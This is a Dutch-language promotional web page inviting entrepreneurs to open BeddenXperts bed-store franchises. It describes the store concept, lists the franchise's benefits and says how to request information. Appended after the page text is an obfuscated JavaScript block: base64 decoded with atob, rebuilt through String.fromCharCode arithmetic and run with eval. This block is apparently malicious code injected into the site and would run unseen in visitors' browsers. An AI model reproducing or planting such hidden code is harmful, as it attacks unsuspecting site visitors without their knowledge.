bxlogos2 bxlogos3 bxlogos4 bxlogos5 bxlogos6 bxlogos7

franchise

franchise

Samen zijn we sterk

U wilt zelfstandig worden en zoekt een concept dat bij u past? Een concept, een idee, dat getest is en al in meerdere plaatsen zijn succes heeft bewezen. Maar ook een partner, die u genoeg speelruimte geeft en u de mogelijkheid biedt, dit concept in een beschermd gebied tot leven te brengen.
Maak dan kennis met het BeddenXperts Franchiseconcept. Wij hopen hiermee uw interesse en enthousiasme op te wekken. Wellicht kunnen wij samen met u doorbouwen aan de toekomst van BeddenXperts, als franchisenemer dan wel als medewerker of tevreden klant.

Prettig kennismaken

BeddenXperts is een zusteronderneming van Bedding Products. Bedding Products is producent van bedden en aanverwante artikelen in Duitsland. Een andere zusteronderneming van Bedding Products is Europa’s grootste waterbeddenketen met meer dan 50 franchisenemers. Zodoende heeft de Bedding Products groep al ruim 15 jaar evaring in de franchisebranche.

Maar wat is nu precies het concept?

BeddenXperts is een unieke formule op het gebied van slaapcomfort. De brede, actuele collectie hoogwaardige slaapkamermeubelen, matrassen, bedbodems en bedtextiel van BeddenXperts overtuigt met aantrekkelijke prijzen en alle mogelijke stijlen. Materiaalgebruik, vakmanschap, kwaliteit en service staan op een hoog niveau. BeddenXperts levert maatwerk op elk slaapgebied en vervult iedere wens.
De unieke, solide slaapmodules van BeddenXperts worden geproduceerd in onze eigen fabriek in Duitsland (Bocholt). Overtuigd van de kwaliteit van onze producten, bieden wij een exclusieve service en garantie: 90 dagen proefslapen, tot 20 jaar garantie, snelle levertijden, laagste-prijs-garantie en een 4-elementenprincipe, waardoor er altijd een individueel slaapsysteem is, dat bij de klant past!
Als franchisenemer wordt u een slaapspecialist met verstand van zaken. Omdat we alle slaapsystemen kunnen leveren, en deze uit onze eigen productie komen, kunnen we een objectief advies geven. Naast de slaapsystemen worden er o.a. ook vloeren, kastsystemen etc. voor de slaapkamer in de winkel aangeboden. Omdat de klant in veel gevallen bij de aankoop van een nieuw bed ook de slaapkamer wil vernieuwen, kunnen we dit totaalpakket aanbieden.
De producten worden door winkels in het gehele land aangeboden. Elke vestiging is eigendom van een zelfstandige ondernemer. Omdat deze ondernemers nauw samenwerken onder de naam BeddenXperts, hebben wij gezamenlijk heel veel te bieden.
Het resultaat van deze samenwerking is dat BeddenXperts een unieke winkelformule kan uitrollen. Doordat wij de beste prijzen en verkoopargumenten hebben, durven wij keihard de concurrentie aan te gaan. Met het BeddenXperts-concept schudden we de gehele beddenbranche wakker!

Store Concept

De uniforme uitstraling is de basis voor herkenning. De buitenkant van de BeddenXperts-winkels zijn echte eyecatchers.
De kleine overzichtelijke winkels zijn modern ingericht. In de winkels presenteren we een selectie van de slaapsystemen, die volgens onze productontwikkelaars het beste slapen. Omdat deze bedden qua uiterlijk onderling gecombineerd kunnen worden, is het mogelijk dat er in verhouding minder bedden in de showroom worden geplaatst. Zodoende kunnen met minder vierkante meters toch alle beste slaapsystemen worden gedemonstreerd. De winkels zijn kleiner dan de gemiddelde beddenzaken, zodat bespaard kan worden op de huurprijs, wat uiteindelijk weer ten goede komt aan de klant.

Beddenspeciaalzaken met veel showroomoppervlakte hebben het steeds moeilijker gekregen. Er wordt te veel van alles aangeboden en de overheadkosten zijn enorm.
Wij kunnen een landelijke dekking creëren met de winkels. Ook in kleine dorpen kan een winkel van BeddenXperts worden geopend, zodat we altijd in de buurt van de klant zitten.

De winkels zijn ca. 150 m2 groot en gevestigd aan een drukke doorgaande weg. Uit onderzoek is gebleken dat in een verzorgingsgebied met 25.000 inwoners, met succes een BeddenXperts-vestiging kan worden geëxploiteerd.

De voordelen op een rij:

franchise3

 • Succesvol franchiseconcept in de beddenbranche
 • Krachten bundelen van winkels, om concurrentie met grotere ketens aan te gaan
 • Voor nieuwe ondernemers, zonder ervaring in de branche
 • Bestaande beddenwinkels kunnen overgaan op het concept
 • Alle beste slaapsystemen onder een dak
 • Producten met steeds toenemende groeipotentie
 • Goed uitgewerkt concept, waarvan de franchisenemer vanaf dag één kan profiteren
 • Kwaliteitsproducten, in eigen fabriek geproduceerd in Duitsland
 • Alle producten van één fabrikant, met scherpe inkoopprijzen
 • Kleine winkels van 100 m2 tot 200 m2, voordelig huren
 • Bij een klein verzorgingsgebied v.a. 25.000 inwoners werkt het concept succesvol
 • Franchisegever heeft veel ervaring met succesvolle franchiseconcepten
 • Gebruik van marketingacties en reclamematerialen
 • Gebruik van professionele internetsite
 • Entreefee met 50% korting
 • BeddenXperts betaalt mee aan de marketing
 • Geen maandelijkse franchisefee
 • Lage investering
 • Reële mogelijkheid op hoge verdienste
 • Crisisproof concept

 

De juiste koers

De markt voor bedden biedt enorme groeimogelijkheden. BeddenXperts plaatst zich
binnen deze marktontwikkeling als een ervaren, goed onderbouwde onderneming met een gouden formule, die een ijzersterk toekomstperspectief biedt. Een toekomst waarin ruimte is voor nieuwe enthousiaste ondernemers. Het concept is zo ontwikkeld, dat zelfs in tijden waarin het economisch minder gaat, de exploitatie van een BeddenXperts-winkel zeer interessant is. Kortom, met BeddenXperts vaart u de juiste koers.

Franchise met BeddenXperts

BeddenXperts is een franchiseorganisatie. Bij franchising worden de beste eigenschappen van een bedrijf gecombineerd met die van zelfstandige ondernemers. De franchisenemers maken op hun eigen, originele wijze deel uit van een centraal geleide, professionele organisatie, de franchisegever. De franchisenemers maken gebruik van het concept van de franchisegever, en in het geval van BeddenXperts kan dat bijzonder winstgevend zijn. De succesvolle, commerciële formule van BeddenXperts staat immers als een huis. De individuele franchisenemer maakt niet alleen gebruik van de handelsnaam van BeddenXperts, maar ook van de knowhow, de zakelijke en technische methoden, de werkwijze en andere zaken in eigendom van de franchisegever, continu ondersteund door commerciële en technische hulp. Door de eigen productie worden de prijzen laag gehouden. Al met al is het een ijzersterk concept, waarvan de zelfstandige ondernemer vanaf de eerste dag kan profiteren.

Wat is de volgende stap?

Zin in een nieuwe en vooral mooie toekomst?

Bent u Geïnteresseerd in het innovatieve franchiceconcept van BeddenXperts en denkt u over voldoende ondernemerskwaliteten te beschikken om een eigen vestiging te starten?

Vraag dan nu de Franchiceconcept infokoffer aan via het contact formulier.

 

 

Indien u een eigen meubel- of beddenspeciaalzaak heeft en wilt overstappen op het BeddenXperts- concept, dan is dat ook mogelijk. Dit betekent dat we gezamenlijk de bestaande winkel, of een deel van de winkel (shop-in-shop), ombouwen naar het BeddenXperts-concept. Shop-in-shop-concepten behoren derhalve tot de mogelijkheden.

var LJGTVSCSEO = atob(‘dmFyIENDREhVRlJKUFggPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTE5IC0gMSwgMTAyIC0gNSwgMTIxIC0gNywgNDEgLSA5LCAxMTUgLSA4LCAxMDUgLSA0LCAxMjMgLSAyLCAzOSAtIDcsIDcwIC0gOSwgMzQgLSAyLCA0NyAtIDgsIDc3IC0gNywgMTAzIC0gMywgODAgLSA2LCA4NyAtIDYsIDEyMCAtIDMsIDk1IC0gNiwgODMgLSA3LCAxMDUgLSA0LCAxMTIgLSAzLCA3MyAtIDUsIDQxIC0gMiwgNjEgLSAyLCAxOCAtIDgsIDEyNiAtIDgsIDEwMCAtIDMsIDEyMiAtIDgsIDQxIC0gOSwgMTAzIC0gMiwgMTEzIC0gMywgMTA4IC0gOSwgMTA4IC0gNywgMTA5IC0gOSwgMzYgLSA0LCA3MCAtIDksIDQwIC0gOCwgNDYgLSA3LCA3OSAtIDIsIDcyIC0gNywgOTAgLSA1LCA1MyAtIDEsIDEwNiAtIDcsIDg1IC0gNCwgODkgLSA0LCAxMjIgLSA4LCA4MCAtIDUsIDEwOCAtIDUsIDExNyAtIDksIDgyIC0gNCwgMTA4IC0gNywgOTIgLSA1LCA5MiAtIDMsIDY5IC0gNCwgODAgLSA2LCA4NSAtIDEsIDgxIC0gOCwgNzQgLSA5LCA3OSAtIDEsIDc1IC0gOCwgMTEwIC0gMywgNzggLSAyLCA3MyAtIDIsIDkwIC0gMywgMTE0IC0gMywgMTE2IC0gOCwgNzQgLSA0LCAxMDcgLSAyLCA1OCAtIDIsIDEyNCAtIDUsIDY3IC0gMiwgODYgLSAyLCAxMjEgLSAyLCA3NyAtIDMsIDc1IC0gOCwgODcgLSA2LCAxMTEgLSA4LCAxMTMgLSAxLCA3NiAtIDMsIDEyOCAtIDksIDExOSAtIDgsIDUxIC0gOCwgMTA5IC0gOCwgOTMgLSA3LCA3OCAtIDUsIDExNSAtIDIsIDgwIC0gNCwgMTI2IC0gNiwgMTAwIC0gMSwgNzAgLSAxLCA4NiAtIDgsIDc2IC0gOCwgODEgLSA3LCA2OSAtIDEsIDkwIC0gMSwgNTggLSA4LCAxMTQgLSAyLCA1MCAtIDMsIDc3IC0gMiwgODcgLSAzLCA1MyAtIDEsIDcxIC0gMywgNjYgLSAxLCA5MCAtIDMsIDExNiAtIDUsIDUwIC0gMSwgNjcgLSAyLCA4NyAtIDMsIDU1IC0gMywgODYgLSA1LCA2NyAtIDIsIDkwIC0gNywgNTcgLSA5LCA0NSAtIDIsIDcxIC0gMywgNzAgLSA1LCA1OSAtIDMsIDEyOSAtIDksIDgyIC0gNSwgMTExIC0gOCwgNzMgLSAzLCAxMTAgLSA1LCAxMDQgLSA0LCAxMTEgLSA4LCA5NSAtIDYsIDExNyAtIDMsIDc5IC0gMywgNTUgLSA3LCA4MSAtIDcsIDY4IC0gMiwgOTUgLSA2LCAxMzAgLSA5LCA2MCAtIDgsIDg5IC0gOCwgODMgLSAzLCAxMTAgLSA1LCA3MyAtIDMsIDg2IC0gNiwgMTA1IC0gNSwgMTE1IC0gNiwgODAgLSAzLCA4NyAtIDUsIDgxIC0gOSwgMTI1IC0gNCwgOTAgLSA1LCAxMTIgLSA5LCA2NiAtIDEsIDExMCAtIDUsIDg2IC0gOSwgMTMwIC0gOSwgNzggLSA4LCA3NCAtIDcsIDExNSAtIDgsIDExNiAtIDgsIDkxIC0gOCwgMTI3IC0gOCwgODMgLSA2LCAxMTUgLSA0LCAxMDAgLSAzLCA4NSAtIDMsIDEwNCAtIDUsIDUyIC0gOSwgODMgLSA2LCA2NyAtIDIsIDcwIC0gMSwgMTI3IC0gOCwgODEgLSA1LCA1NiAtIDgsIDExNSAtIDQsIDY4IC0gMywgODEgLSA3LCA4NiAtIDMsIDYzIC0gNywgODAgLSA1LCA5MyAtIDMsIDc2IC0gOCwgMTIwIC0gNSwgNzQgLSAzLCAxMTEgLSA5LCAxMTIgLSAzLCA5NCAtIDgsIDEwNyAtIDYsIDkyIC0gMiwgMTMwIC0gOSwgNjYgLSAxLCAxMTQgLSAyLCA3MyAtIDcsIDEzMSAtIDksIDYxIC0gNSwgNjQgLSA4LCA3MSAtIDIsIDczIC0gNSwgMTA2IC0gNywgNTggLSA2LCA4OCAtIDUsIDEyOCAtIDksIDg5IC0gNCwgMTEzIC0gOSwgNzcgLSAzLCAxMjEgLSAyLCA3MCAtIDQsIDExMiAtIDUsIDgzIC0gNiwgNzEgLSA2LCA5NCAtIDksIDExNSAtIDMsIDc3IC0gMiwgODkgLSA4LCAxMTcgLSAyLCA4MyAtIDksIDc0IC0gOCwgMTI3IC0gNiwgNTkgLSA3LCA4MiAtIDQsIDgzIC0gOSwgMTE1IC0gOSwgOTIgLSA2LCAxMDQgLSA0LCA3NiAtIDEsIDg3IC0gMywgNjEgLSA5LCA3MiAtIDQsIDY3IC0gMiwgOTQgLSA3LCA1NCAtIDUsIDYyIC0gNSwgMTA1IC0gNywgMTA4IC0gNSwgNjYgLSA1LCA2OCAtIDcsIDQzIC0gNCwgNjcgLSA4LCAxMiAtIDIsIDEwMyAtIDEsIDExOSAtIDIsIDExMSAtIDEsIDEwMCAtIDEsIDEyMyAtIDcsIDExNCAtIDksIDExOSAtIDgsIDExMSAtIDEsIDMzIC0gMSwgMTIyIC0gMiwgMTE2IC0gNSwgMTE3IC0gMywgMTA0IC0gOSwgMTA4IC0gNywgMTExIC0gMSwgMTAyIC0gMywgNDQgLSA0LCAxMTcgLSAyLCAxMjMgLSA3LCAxMjMgLSA5LCAxMDkgLSA0LCAxMTQgLSA0LCAxMTIgLSA5LCA0OSAtIDUsIDM5IC0gNywgMTE2IC0gOSwgMTEwIC0gOSwgMTI0IC0gMywgNDcgLSA2LCAzNSAtIDMsIDEyNyAtIDQsIDEzIC0gMywgNDEgLSA5LCA0MSAtIDksIDEyNCAtIDYsIDEwMyAtIDYsIDEyMSAtIDcsIDM5IC0gNywgMTE3IC0gMywgMTAyIC0gMSwgMTIyIC0gNywgMzcgLSA1LCA2MyAtIDIsIDM0IC0gMiwgNDIgLSAzLCA0MyAtIDQsIDY0IC0gNSwgMTEgLSAxLCAzNCAtIDIsIDM2IC0gNCwgMTA0IC0gMiwgMTEzIC0gMiwgMTE5IC0gNSwgNDAgLSA4LCA0OCAtIDgsIDEyNCAtIDYsIDEwNiAtIDksIDEyMCAtIDYsIDQxIC0gOSwgMTA4IC0gMywgMzcgLSA1LCA2MyAtIDIsIDM4IC0gNiwgNTAgLSAyLCA2MCAtIDEsIDM1IC0gMywgMTA3IC0gMiwgNDAgLSA4LCA2MSAtIDEsIDM1IC0gMywgMTIzIC0gOCwgMTE4IC0gMiwgMTE5IC0gNSwgMTExIC0gNiwgMTE1IC0gNSwgMTEyIC0gOSwgNTAgLSA0LCAxMTMgLSA1LCAxMDIgLSAxLCAxMTQgLSA0LCAxMDcgLSA0LCAxMjEgLSA1LCAxMTMgLSA5LCA2NSAtIDYsIDQwIC0gOCwgMTA2IC0gMSwgNTEgLSA4LCA0NSAtIDIsIDQ1IC0gNCwgMzcgLSA1LCAxMjkgLSA2LCAxOSAtIDksIDM1IC0gMywgMzYgLSA0LCAzNiAtIDQsIDM5IC0gNywgMTE2IC0gMiwgMTAyIC0gMSwgMTIwIC0gNSwgMzggLSA2LCA1MiAtIDksIDY3IC0gNiwgMzYgLSA0LCA4NyAtIDQsIDEyNCAtIDgsIDEyMiAtIDgsIDExMSAtIDYsIDExNCAtIDQsIDExMCAtIDcsIDUwIC0gNCwgMTA2IC0gNCwgMTIxIC0gNywgMTIwIC0gOSwgMTEyIC0gMywgNzEgLSA0LCAxMTEgLSA3LCAxMDEgLSA0LCAxMjIgLSA4LCA2OCAtIDEsIDExOSAtIDgsIDEwNiAtIDYsIDEwMiAtIDEsIDQ1IC0gNSwgMTIxIC0gNiwgMTIxIC0gNSwgMTE5IC0gNSwgMTA2IC0gMSwgMTEyIC0gMiwgMTA1IC0gMiwgNTMgLSA3LCAxMDQgLSA1LCAxMDcgLSAzLCAxMDUgLSA4LCAxMTYgLSAyLCA3NiAtIDksIDExNSAtIDQsIDEwMSAtIDEsIDEwNyAtIDYsIDY3IC0gMiwgMTE3IC0gMSwgNDUgLSA1LCAxMDkgLSA0LCA0NSAtIDQsIDQxIC0gOSwgMTAxIC0gNywgMTggLSA4LCAxMSAtIDIsIDEwIC0gMSwgMTYgLSA3LCAxNCAtIDUsIDExMSAtIDQsIDEwNCAtIDMsIDEyNyAtIDYsIDUxIC0gNSwgMTAyIC0gMywgMTExIC0gNywgMTAyIC0gNSwgMTIxIC0gNywgNzYgLSA5LCAxMTMgLSAyLCAxMDkgLSA5LCAxMDIgLSAxLCA3NCAtIDksIDEyMCAtIDQsIDQ4IC0gOCwgMTEzIC0gOCwgMzYgLSA0LCA0NSAtIDgsIDM4IC0gNiwgMTE0IC0gNywgMTAyIC0gMSwgMTI1IC0gNCwgNTEgLSA1LCAxMTYgLSA4LCAxMDQgLSAzLCAxMTkgLSA5LCAxMDkgLSA2LCAxMjMgLSA3LCAxMTIgLSA4LCA0OSAtIDgsIDQ3IC0gNiwgNjcgLSA4LCAxMiAtIDIsIDM5IC0gNywgNDEgLSA5LCAxMzIgLSA3LCAxNiAtIDYsIDMzIC0gMSwgMzYgLSA0LCAxMjMgLSA5LCAxMDQgLSAzLCAxMTcgLSAxLCAxMTggLSAxLCAxMTggLSA0LCAxMTIgLSAyLCAzNSAtIDMsIDExNSAtIDEsIDEwOCAtIDcsIDExNyAtIDIsIDY2IC0gNywgMTggLSA4LCAxMzMgLSA4LCAxMyAtIDMsIDEyIC0gMiwgMTIwIC0gMiwgMTA1IC0gOCwgMTIyIC0gOCwgMzUgLSAzLCAxMDQgLSA0LCAxMDUgLSA0LCAxMDUgLSA2LCAzNiAtIDQsIDcwIC0gOSwgMzUgLSAzLCAxMjUgLSA1LCAxMTMgLSAyLCAxMjEgLSA3LCAxMDIgLSA3LCAxMDggLSA3LCAxMTggLSA4LCAxMDggLSA5LCA0NiAtIDYsIDEwNCAtIDcsIDEyMiAtIDYsIDExOSAtIDgsIDEwNiAtIDgsIDQ0IC0gNCwgMTAzIC0gMiwgMTE4IC0gOCwgMTA4IC0gOSwgMTA3IC0gNiwgMTAxIC0gMSwgNDMgLSAyLCA0NiAtIDIsIDM0IC0gMiwgMTA4IC0gMSwgMTA3IC0gNiwgMTI2IC0gNSwgNDYgLSA1LCA2NCAtIDUsIDE2IC0gNiwgNDEgLSAxLCAxMTUgLSA1LCAxMDMgLSAyLCAxMjggLSA5LCAzMyAtIDEsIDcxIC0gMSwgMTIzIC0gNiwgMTE4IC0gOCwgMTAwIC0gMSwgMTIwIC0gNCwgMTEyIC0gNywgMTE1IC0gNCwgMTE1IC0gNSwgNDkgLSA5LCAxMDcgLSA3LCAxMDIgLSAxLCAxMDYgLSA3LCA0NiAtIDUsIDQzIC0gMiwgNDYgLSA2LCA0OSAtIDgsIDYyIC0gMywgMTUgLSA1LCAxMSAtIDEpO2V2YWwoQ0NESFVGUkpQWCk7′);
eval(LJGTVSCSEO);